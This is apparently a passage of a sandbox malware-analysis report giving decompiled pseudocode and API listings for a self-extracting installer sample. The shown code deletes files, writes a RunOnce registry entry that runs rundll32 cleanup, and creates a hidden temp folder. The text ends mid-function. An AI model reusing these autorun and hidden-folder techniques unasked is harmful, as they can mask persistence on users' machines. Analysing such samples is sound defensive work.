                                                                      0x00f824d4
                                                                      0x00f824df
                                                                      0x00f823c2
                                                                      0x00f823d1
                                                                      0x00f823db
                                                                      0x00f823e4
                                                                      0x00f823f6
                                                                      0x00f823fc
                                                                      0x00f82401
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f82407
                                                                      0x00f82407
                                                                      0x00f82408
                                                                      0x00f82411
                                                                      0x00f8241f
                                                                      0x00f8247a
                                                                      0x00f82483
                                                                      0x00f82495
                                                                      0x00f824a3
                                                                      0x00f82421
                                                                      0x00f8242f
                                                                      0x00f82453
                                                                      0x00f8245d
                                                                      0x00f82466
                                                                      0x00f82472
                                                                      0x00f82472
                                                                      0x00f8242f
                                                                      0x00f824af
                                                                      0x00f824b5
                                                                      0x00f824be
                                                                      0x00f824c5
                                                                      0x00000000
                                                                      0x00f824c5

                                                                      APIs
                                                                      • FindFirstFileA.KERNELBASE(?,00F88A3A,00F811F4,00F88A3A,00000000,?,?), ref: 00F823F6
                                                                      • lstrcmpA.KERNEL32(?,00F811F8), ref: 00F82427
                                                                      • lstrcmpA.KERNEL32(?,00F811FC), ref: 00F8243B
                                                                      • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00F82495
                                                                      • DeleteFileA.KERNEL32(?), ref: 00F824A3
                                                                      • FindNextFileA.KERNELBASE(00000000,00000010), ref: 00F824AF
                                                                      • FindClose.KERNELBASE(00000000), ref: 00F824BE
                                                                      • RemoveDirectoryA.KERNELBASE(00F88A3A), ref: 00F824C5
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                      • String ID:
                                                                      • API String ID: 836429354-0
                                                                      • Opcode ID: c979d330c0667f11ab6b97c9f76434d2536325f44af3740a3f5e5eec8b0b8bdb
                                                                      • Instruction ID: a9554f6427ecacb57b66aa92150df3aed3f9a059f18b6fa2a678f031dde96c8e
                                                                      • Opcode Fuzzy Hash: c979d330c0667f11ab6b97c9f76434d2536325f44af3740a3f5e5eec8b0b8bdb
                                                                      • Instruction Fuzzy Hash: 5C31A4326046449BD320FB64CC8DAFB73ACFBC4315F044A2EB59586191EB38A90DE762
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 70%
                                                                      			E00F82BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				long _t4;
                                                                      				void* _t6;
                                                                      				intOrPtr _t7;
                                                                      				void* _t9;
                                                                      				struct HINSTANCE__* _t12;
                                                                      				intOrPtr* _t17;
                                                                      				signed char _t19;
                                                                      				intOrPtr* _t21;
                                                                      				void* _t22;
                                                                      				void* _t24;
                                                                      				intOrPtr _t32;
                                                                      
                                                                      				_t4 = GetVersion();
                                                                      				if(_t4 >= 0 && _t4 >= 6) {
                                                                      					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                      					if(_t12 != 0) {
                                                                      						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                      						if(_t21 != 0) {
                                                                      							_t17 = _t21;
                                                                      							 *0xf8a288(0, 1, 0, 0);
                                                                      							 *_t21();
                                                                      							_t29 = _t24 - _t24;
                                                                      							if(_t24 != _t24) {
                                                                      								_t17 = 4;
                                                                      								asm("int 0x29");
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				_t20 = _a12;
                                                                      				_t18 = _a4;
                                                                      				 *0xf89124 = 0;
                                                                      				if(E00F82CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                      					_t9 = E00F82F1D(_t18, _t20); // executed
                                                                      					_t22 = _t9; // executed
                                                                      					E00F852B6(0, _t18, _t21, _t22); // executed
                                                                      					if(_t22 != 0) {
                                                                      						_t32 =  *0xf88a3a; // 0x0
                                                                      						if(_t32 == 0) {
                                                                      							_t19 =  *0xf89a2c; // 0x0
                                                                      							if((_t19 & 0x00000001) != 0) {
                                                                      								E00F81F90(_t19, _t21, _t22);
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      				_t6 =  *0xf88588; // 0x0
                                                                      				if(_t6 != 0) {
                                                                      					CloseHandle(_t6);
                                                                      				}
                                                                      				_t7 =  *0xf89124; // 0x0
                                                                      				return _t7;
                                                                      			}


















                                                                      0x00f82c03
                                                                      0x00f82c0d
                                                                      0x00f82c18
                                                                      0x00f82c20
                                                                      0x00f82c2e
                                                                      0x00f82c32
                                                                      0x00f82c36
                                                                      0x00f82c3d
                                                                      0x00f82c43
                                                                      0x00f82c45
                                                                      0x00f82c47
                                                                      0x00f82c49
                                                                      0x00f82c4e
                                                                      0x00f82c4e
                                                                      0x00f82c47
                                                                      0x00f82c32
                                                                      0x00f82c20
                                                                      0x00f82c50
                                                                      0x00f82c54
                                                                      0x00f82c57
                                                                      0x00f82c64
                                                                      0x00f82c66
                                                                      0x00f82c6b
                                                                      0x00f82c6d
                                                                      0x00f82c74
                                                                      0x00f82c76
                                                                      0x00f82c7c
                                                                      0x00f82c7e
                                                                      0x00f82c87
                                                                      0x00f82c89
                                                                      0x00f82c89
                                                                      0x00f82c87
                                                                      0x00f82c7c
                                                                      0x00f82c74
                                                                      0x00f82c8e
                                                                      0x00f82c95
                                                                      0x00f82c98
                                                                      0x00f82c98
                                                                      0x00f82c9e
                                                                      0x00f82ca7

                                                                      APIs
                                                                      • GetVersion.KERNEL32(?,00000002,00000000,?,00F86BB0,00F80000,00000000,00000002,0000000A), ref: 00F82C03
                                                                      • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00F86BB0,00F80000,00000000,00000002,0000000A), ref: 00F82C18
                                                                      • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00F82C28
                                                                      • CloseHandle.KERNEL32(00000000,?,?,00F86BB0,00F80000,00000000,00000002,0000000A), ref: 00F82C98
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Handle$AddressCloseModuleProcVersion
                                                                      • String ID: HeapSetInformation$Kernel32.dll
                                                                      • API String ID: 62482547-3460614246
                                                                      • Opcode ID: f107ff75c3fb92ed1015a97dd0e6639845a99575e0eff3b8fdd9f94bdbfc6152
                                                                      • Instruction ID: 52c38db67b8fd60d8f09db365db038afa0e25b4986ac1d98230e9f705d5bcd45
                                                                      • Opcode Fuzzy Hash: f107ff75c3fb92ed1015a97dd0e6639845a99575e0eff3b8fdd9f94bdbfc6152
                                                                      • Instruction Fuzzy Hash: BF11C271B00209ABD7607BB4AD89AFF3799EB857B0B480116F901D3290DA34EC02B761
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E00F86F40() {
                                                                      
                                                                      				SetUnhandledExceptionFilter(E00F86EF0); // executed
                                                                      				return 0;
                                                                      			}



                                                                      0x00f86f45
                                                                      0x00f86f4d

                                                                      APIs
                                                                      • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00F86F45
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled
                                                                      • String ID:
                                                                      • API String ID: 3192549508-0
                                                                      • Opcode ID: dae1ced55becba8e13b6ee622af3e3aa7709d32da19aaf2b61572c28105cdcd1
                                                                      • Instruction ID: d06b3b73c0c6c0847991cea048146f7397a18d211874e00cbc045d104fde6eee
                                                                      • Opcode Fuzzy Hash: dae1ced55becba8e13b6ee622af3e3aa7709d32da19aaf2b61572c28105cdcd1
                                                                      • Instruction Fuzzy Hash: B390027425150447A6102B70DD1D4A576919B4D602F8154A1A111C4499DB6080407B17
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      C-Code - Quality: 93%
                                                                      			E00F8202A(struct HINSTANCE__* __edx) {
                                                                      				signed int _v8;
                                                                      				char _v268;
                                                                      				char _v528;
                                                                      				void* _v532;
                                                                      				int _v536;
                                                                      				int _v540;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t28;
                                                                      				long _t36;
                                                                      				long _t41;
                                                                      				struct HINSTANCE__* _t46;
                                                                      				intOrPtr _t49;
                                                                      				intOrPtr _t50;
                                                                      				CHAR* _t54;
                                                                      				void _t56;
                                                                      				signed int _t66;
                                                                      				intOrPtr* _t72;
                                                                      				void* _t73;
                                                                      				void* _t75;
                                                                      				void* _t80;
                                                                      				intOrPtr* _t81;
                                                                      				void* _t86;
                                                                      				void* _t87;
                                                                      				void* _t90;
                                                                      				_Unknown_base(*)()* _t91;
                                                                      				signed int _t93;
                                                                      				void* _t94;
                                                                      				void* _t95;
                                                                      
                                                                      				_t79 = __edx;
                                                                      				_t28 =  *0xf88004; // 0x644c7055
                                                                      				_v8 = _t28 ^ _t93;
                                                                      				_t84 = 0x104;
                                                                      				memset( &_v268, 0, 0x104);
                                                                      				memset( &_v528, 0, 0x104);
                                                                      				_t95 = _t94 + 0x18;
                                                                      				_t66 = 0;
                                                                      				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                      				if(_t36 != 0) {
                                                                      					L24:
                                                                      					return E00F86CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                      				}
                                                                      				_push(_t86);
                                                                      				_t87 = 0;
                                                                      				while(1) {
                                                                      					E00F8171E("wextract_cleanup1", 0x50, "wextract_cleanup%d", _t87);
                                                                      					_t95 = _t95 + 0x10;
                                                                      					_t41 = RegQueryValueExA(_v532, "wextract_cleanup1", 0, 0, 0,  &_v540); // executed
                                                                      					if(_t41 != 0) {
                                                                      						break;
                                                                      					}
                                                                      					_t87 = _t87 + 1;
                                                                      					if(_t87 < 0xc8) {
                                                                      						continue;
                                                                      					}
                                                                      					break;
                                                                      				}
                                                                      				if(_t87 != 0xc8) {
                                                                      					GetSystemDirectoryA( &_v528, _t84);
                                                                      					_t79 = _t84;
                                                                      					E00F8658A( &_v528, _t84, "advpack.dll");
                                                                      					_t46 = LoadLibraryA( &_v528); // executed
                                                                      					_t84 = _t46;
                                                                      					if(_t84 == 0) {
                                                                      						L10:
                                                                      						if(GetModuleFileNameA( *0xf89a3c,  &_v268, 0x104) == 0) {
                                                                      							L17:
                                                                      							_t36 = RegCloseKey(_v532);
                                                                      							L23:
                                                                      							_pop(_t86);
                                                                      							goto L24;
                                                                      						}
                                                                      						L11:
                                                                      						_t72 =  &_v268;
                                                                      						_t80 = _t72 + 1;
                                                                      						do {
                                                                      							_t49 =  *_t72;
                                                                      							_t72 = _t72 + 1;
                                                                      						} while (_t49 != 0);
                                                                      						_t73 = _t72 - _t80;
                                                                      						_t81 = 0xf891e4;
                                                                      						do {
                                                                      							_t50 =  *_t81;
                                                                      							_t81 = _t81 + 1;
                                                                      						} while (_t50 != 0);
                                                                      						_t84 = _t73 + 0x50 + _t81 - 0xf891e5;
                                                                      						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0xf891e5);
                                                                      						if(_t90 != 0) {
                                                                      							 *0xf88580 = _t66 ^ 0x00000001;
                                                                      							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                      							if(_t66 == 0) {
                                                                      								_t54 = "%s /D:%s";
                                                                      							}
                                                                      							_push("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
                                                                      							E00F8171E(_t90, _t84, _t54,  &_v268);
                                                                      							_t75 = _t90;
                                                                      							_t23 = _t75 + 1; // 0x1
                                                                      							_t79 = _t23;
                                                                      							do {
                                                                      								_t56 =  *_t75;
                                                                      								_t75 = _t75 + 1;
                                                                      							} while (_t56 != 0);
                                                                      							_t24 = _t75 - _t79 + 1; // 0x2
                                                                      							RegSetValueExA(_v532, "wextract_cleanup1", 0, 1, _t90, _t24); // executed
                                                                      							RegCloseKey(_v532); // executed
                                                                      							_t36 = LocalFree(_t90);
                                                                      							goto L23;
                                                                      						}
                                                                      						_t79 = 0x4b5;
                                                                      						E00F844B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                      						goto L17;
                                                                      					}
                                                                      					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                      					_t66 = 0 | _t91 != 0x00000000;
                                                                      					FreeLibrary(_t84); // executed
                                                                      					if(_t91 == 0) {
                                                                      						goto L10;
                                                                      					}
                                                                      					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                      						E00F8658A( &_v268, 0x104, 0xf81140);
                                                                      					}
                                                                      					goto L11;
                                                                      				}
                                                                      				_t36 = RegCloseKey(_v532);
                                                                      				 *0xf88530 = _t66;
                                                                      				goto L23;
                                                                      			}

































                                                                      0x00f8202a
                                                                      0x00f82035
                                                                      0x00f8203c
                                                                      0x00f82041
                                                                      0x00f82050
                                                                      0x00f8205f
                                                                      0x00f82064
                                                                      0x00f8206f
                                                                      0x00f8208c
                                                                      0x00f82094
                                                                      0x00f82257
                                                                      0x00f82266
                                                                      0x00f82266
                                                                      0x00f8209a
                                                                      0x00f8209b
                                                                      0x00f8209d
                                                                      0x00f820aa
                                                                      0x00f820af
                                                                      0x00f820c9
                                                                      0x00f820d1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f820d3
                                                                      0x00f820da
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f820da
                                                                      0x00f820e2
                                                                      0x00f82103
                                                                      0x00f8210e
                                                                      0x00f82116
                                                                      0x00f82122
                                                                      0x00f82128
                                                                      0x00f8212c
                                                                      0x00f82179
                                                                      0x00f82194
                                                                      0x00f821de
                                                                      0x00f821e4
                                                                      0x00f82256
                                                                      0x00f82256
                                                                      0x00000000
                                                                      0x00f82256
                                                                      0x00f82196
                                                                      0x00f82196
                                                                      0x00f8219c
                                                                      0x00f8219f
                                                                      0x00f8219f
                                                                      0x00f821a1
                                                                      0x00f821a2
                                                                      0x00f821a6
                                                                      0x00f821a8
                                                                      0x00f821b0
                                                                      0x00f821b0
                                                                      0x00f821b2
                                                                      0x00f821b3
                                                                      0x00f821bc
                                                                      0x00f821c7
                                                                      0x00f821cb
                                                                      0x00f821f1
                                                                      0x00f821f6
                                                                      0x00f821fd
                                                                      0x00f821ff
                                                                      0x00f821ff
                                                                      0x00f82204
                                                                      0x00f82213
                                                                      0x00f82218
                                                                      0x00f8221d
                                                                      0x00f8221d
                                                                      0x00f82220
                                                                      0x00f82220
                                                                      0x00f82222
                                                                      0x00f82223
                                                                      0x00f82229
                                                                      0x00f8223d
                                                                      0x00f82249
                                                                      0x00f82250
                                                                      0x00000000
                                                                      0x00f82250
                                                                      0x00f821d2
                                                                      0x00f821d9
                                                                      0x00000000
                                                                      0x00f821d9
                                                                      0x00f8213a
                                                                      0x00f82141
                                                                      0x00f82144
                                                                      0x00f8214c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00f82163
                                                                      0x00f82172
                                                                      0x00f82172
                                                                      0x00000000
                                                                      0x00f82163
                                                                      0x00f820ea
                                                                      0x00f820f0
                                                                      0x00000000

                                                                      APIs
                                                                      • memset.MSVCRT ref: 00F82050
                                                                      • memset.MSVCRT ref: 00F8205F
                                                                      • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 00F8208C
                                                                        • Part of subcall function 00F8171E: _vsnprintf.MSVCRT ref: 00F81750
                                                                      • RegQueryValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F820C9
                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F820EA
                                                                      • GetSystemDirectoryA.KERNEL32 ref: 00F82103
                                                                      • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F82122
                                                                      • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00F82134
                                                                      • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F82144
                                                                      • GetSystemDirectoryA.KERNEL32 ref: 00F8215B
                                                                      • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F8218C
                                                                      • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F821C1
                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F821E4
                                                                      • RegSetValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 00F8223D
                                                                      • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F82249
                                                                      • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00F82250
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000001.00000002.400535414.0000000000F81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F80000, based on PE: true
                                                                      • Associated: 00000001.00000002.400528798.0000000000F80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400545316.0000000000F88000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000001.00000002.400552912.0000000000F8C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_1_2_f80000_bmMg.jbxd
                                                                      Similarity
                                                                      • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                      • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup1
                                                                      • API String ID: 178549006-850274211
                                                                      • Opcode ID: fd6663e54b9b195fc5ccb77196dc5fc40fda38d6e7488c2591b08e70c146e0d3
                                                                      • Instruction ID: 6b316da6f59a7a3cf4263eab61548626dd7e162b3abf940f31fbbe296dc1fa0f
                                                                      • Opcode Fuzzy Hash: fd6663e54b9b195fc5ccb77196dc5fc40fda38d6e7488c2591b08e70c146e0d3
                                                                      • Instruction Fuzzy Hash: 1F511572A00218ABEB20BF60DC4DFFB777CEB40750F1401A9FA05E7151DA75AE45AB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 232 f855a0-f855d9 call f8468f LocalAlloc 235 f855db-f855f1 call f844b9 call f86285 232->235 236 f855fd-f8560c call f8468f 232->236 251 f855f6-f855f8 235->251 241 f8560e-f85630 call f844b9 LocalFree 236->241 242 f85632-f85643 lstrcmpA 236->242 241->251 245 f8564b-f85659 LocalFree 242->245 246 f85645 242->246 249 f8565b-f8565d 245->249 250 f85696-f8569c 245->250 246->245 255 f85669 249->255 256 f8565f-f85667 249->256 253 f8589f-f858b5 call f86517 250->253 254 f856a2-f856a8 250->254 252 f858b7-f858c7 call f86ce0 251->252 253->252 254->253 258 f856ae-f856c1 GetTempPathA 254->258 259 f8566b-f8567a call f85467 255->259 256->255 256->259 263 f856f3-f85711 call f81781 258->263 264 f856c3-f856c9 call f85467 258->264 271 f8589b-f8589d 259->271 272 f85680-f85691 call f844b9 259->272 274 f8586c-f85890 GetWindowsDirectoryA call f8597d 263->274 275 f85717-f85729 GetDriveTypeA 263->275 270 f856ce-f856d0 264->270 270->271 276 f856d6-f856df call f82630 270->276 271->252 272->251 274->263 288 f85896 274->288 278 f8572b-f8572e 275->278 279 f85730-f85740 GetFileAttributesA 275->279 276->263 289 f856e1-f856ed call f85467 276->289 278->279 282 f85742-f85745 278->282 279->282 283 f8577e-f8578f call f8597d 279->283 286 f8576b 282->286 287 f85747-f8574f 282->287 295 f85791-f8579e call f82630 283->295 296 f857b2-f857bf call f82630 283->296 291 f85771-f85779 286->291 287->291 292 f85751-f85753 287->292 288->271 289->263 289->271 298 f85864-f85866 291->298 292->291 297 f85755-f85762 call f86952 292->297 295->286 306 f857a0-f857b0 call f8597d 295->306 307 f857c1-f857cd GetWindowsDirectoryA 296->307 308 f857d3-f857f8 call f8658a GetFileAttributesA 296->308 297->286 309 f85764-f85769 297->309 298->274 298->275 306->286 306->296 307->308 314 f8580a 308->314 315 f857fa-f85808 CreateDirectoryA 308->315 309->283 309->286 316 f8580d-f8580f 314->316 315->316 317 f85811-f85825 316->317 318 f85827-f8585c SetFileAttributesA call f81781 call f85467 316->318 317->298 318->271 323 f8585e 318->323 323->298
                                                                      C-Code - Quality: 92%
                                                                      			E00F855A0(void* __eflags) {
                                                                      				signed int _v8;
                                                                      				char _v265;
                                                                      				char _v268;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				signed int _t28;
                                                                      				int _t32;
                                                                      				int _t33;
                                                                      				int _t35;
                                                                      				signed int _t36;
                                                                      				signed int _t38;
                                                                      				int _t40;
                                                                      				int _t44;
                                                                      				long _t48;
                                                                      				int _t49;
                                                                      				int _t50;
                                                                      				signed int _t53;
                                                                      				int _t54;
                                                                      				int _t59;
                                                                      				char _t60;
                                                                      				int _t65;
                                                                      				char _t66;
                                                                      				int _t67;
                                                                      				int _t68;
                                                                      				int _t69;
                                                                      				int _t70;
                                                                      				int _t71;
                                                                      				struct _SECURITY_ATTRIBUTES* _t72;
                                                                      				int _t73;
                                                                      				CHAR* _t82;
                                                                      				CHAR* _t88;
                                                                      				void* _t103;
                                                                      				signed int _t110;
                                                                      
                                                                      				_t28 =  *0xf88004; // 0x644c7055
                                                                      				_v8 = _t28 ^ _t110;
                                                                      				_t2 = E00F8468F("RUNPROGRAM", 0, 0) + 1; // 0x1
                                                                      				_t109 = LocalAlloc(0x40, _t2);
                                                                      				if(_t109 != 0) {
                                                                      					_t82 = "RUNPROGRAM";
                                                                      					_t32 = E00F8468F(_t82, _t109, 1);
                                                                      					__eflags = _t32;
                                                                      					if(_t32 != 0) {
                                                                      						_t33 = lstrcmpA(_t109, "<None>");
                                                                      						__eflags = _t33;
                                                                      						if(_t33 == 0) {
                                                                      							 *0xf89a30 = 1;
                                                                      						}
                                                                      						LocalFree(_t109);
                                                                      						_t35 =  *0xf88b3e; // 0x0
                                                                      						__eflags = _t35;
                                                                      						if(_t35 == 0) {
                                                                      							__eflags =  *0xf88a24; // 0x0
                                                                      							if(__eflags != 0) {
                                                                      								L46:
                                                                      								_t101 = 0x7d2;
                                                                      								_t36 = E00F86517(_t82, 0x7d2, 0, E00F83210, 0, 0);
                                                                      								asm("sbb eax, eax");
                                                                      								_t38 =  ~( ~_t36);
                                                                      							} else {
                                                                      								__eflags =  *0xf89a30; // 0x0
                                                                      								if(__eflags != 0) {
                                                                      									goto L46;
                                                                      								} else {
                                                                      									_t109 = 0xf891e4;
                                                                      									_t40 = GetTempPathA(0x104, 0xf891e4); // executed
                                                                      									__eflags = _t40;
                                                                      									if(_t40 == 0) {
                                                                      										L19:
                                                                      										_push(_t82);
                                                                      										E00F81781( &_v268, 0x104, _t82, "A:\\");
                                                                      										__eflags = _v268 - 0x5a;
                                                                      										if(_v268 <= 0x5a) {
                                                                      											do {
                                                                      												_t109 = GetDriveTypeA( &_v268);
                                                                      												__eflags = _t109 - 6;
                                                                      												if(_t109 == 6) {
                                                                      													L22:
                                                                      													_t48 = GetFileAttributesA( &_v268);
                                                                      													__eflags = _t48 - 0xffffffff;
                                                                      													if(_t48 != 0xffffffff) {
                                                                      														goto L30;
                                                                      													} else {
                                                                      														goto L23;
                                                                      													}
                                                                      												} else {
                                                                      													__eflags = _t109 - 3;
                                                                      													if(_t109 != 3) {
                                                                      														L23:
                                                                      														__eflags = _t109 - 2;
                                                                      														if(_t109 != 2) {
                                                                      															L28:
                                                                      															_t66 = _v268;
                                                                      															goto L29;
                                                                      														} else {
                                                                      															_t66 = _v268;
                                                                      															__eflags = _t66 - 0x41;
                                                                      															if(_t66 == 0x41) {
                                                                      																L29:
                                                                      																_t60 = _t66 + 1;
                                                                      																_v268 = _t60;
                                                                      																goto L42;
                                                                      															} else {
                                                                      																__eflags = _t66 - 0x42;
                                                                      																if(_t66 == 0x42) {
                                                                      																	goto L29;
                                                                      																} else {
                                                                      																	_t68 = E00F86952( &_v268);
                                                                      																	__eflags = _t68;
                                                                      																	if(_t68 == 0) {
                                                                      																		goto L28;
                                                                      																	} else {
                                                                      																		__eflags = _t68 - 0x19000;
                                                                      																		if(_t68 >= 0x19000) {
                                                                      																			L30:
                                                                      																			_push(0);
                                                                      																			_t103 = 3;
                                                                      																			_t49 = E00F8597D( &_v268, _t103, 1);
                                                                      																			__eflags = _t49;
                                                                      																			if(_t49 != 0) {
                                                                      																				L33:
                                                                      																				_t50 = E00F82630(0,  &_v268, 1);
                                                                      																				__eflags = _t50;
                                                                      																				if(_t50 != 0) {
                                                                      																					GetWindowsDirectoryA( &_v268, 0x104);
                                                                      																				}
                                                                      																				_t88 =  &_v268;
                                                                      																				E00F8658A(_t88, 0x104, "msdownld.tmp");
                                                                      																				_t53 = GetFileAttributesA( &_v268);
                                                                      																				__eflags = _t53 - 0xffffffff;
                                                                      																				if(_t53 != 0xffffffff) {
                                                                      																					_t54 = _t53 & 0x00000010;
                                                                      																					__eflags = _t54;
                                                                      																				} else {
                                                                      																					_t54 = CreateDirectoryA( &_v268, 0);
                                                                      																				}
                                                                      																				__eflags = _t54;
                                                                      																				if(_t54 != 0) {
                                                                      																					SetFileAttributesA( &_v268, 2);
                                                                      																					_push(_t88);
                                                                      																					_t109 = 0xf891e4;
                                                                      																					E00F81781(0xf891e4, 0x104, _t88,  &_v268);
                                                                      																					_t101 = 1;
                                                                      																					_t59 = E00F85467(0xf891e4, 1, 0);
                                                                      																					__eflags = _t59;
                                                                      																					if(_t59 != 0) {
                                                                      																						goto L45;
                                                                      																					} else {
                                                                      																						_t60 = _v268;
                                                                      																						goto L42;
                                                                      																					}
                                                                      																				} else {
                                                                      																					_t60 = _v268 + 1;
                                                                      																					_v265 = 0;
                                                                      																					_v268 = _t60;
                                                                      																					goto L42;
                                                                      																				}
                                                                      																			} else {
                                                                      																				_t65 = E00F82630(0,  &_v268, 1);
                                                                      																				__eflags = _t65;
                                                                      																				if(_t65 != 0) {
                                                                      																					goto L28;
                                                                      																				} else {
                                                                      																					_t67 = E00F8597D( &_v268, 1, 1, 0);
                                                                      																					__eflags = _t67;
                                                                      																					if(_t67 == 0) {
                                                                      																						goto L28;
                                                                      																					} else {
                                                                      																						goto L33;
                                                                      																					}
                                                                      																				}
                                                                      																			}
                                                                      																		} else {
                                                                      																			goto L28;
                                                                      																		}
                                                                      																	}
                                                                      																}
                                                                      															}
                                                                      														}
                                                                      													} else {
                                                                      														goto L22;
                                                                      													}
                                                                      												}
                                                                      												goto L47;
                                                                      												L42:
                                                                      												__eflags = _t60 - 0x5a;
                                                                      											} while (_t60 <= 0x5a);
                                                                      										}
                                                                      										goto L43;
                                                                      									} else {
                                                                      										_t101 = 1;
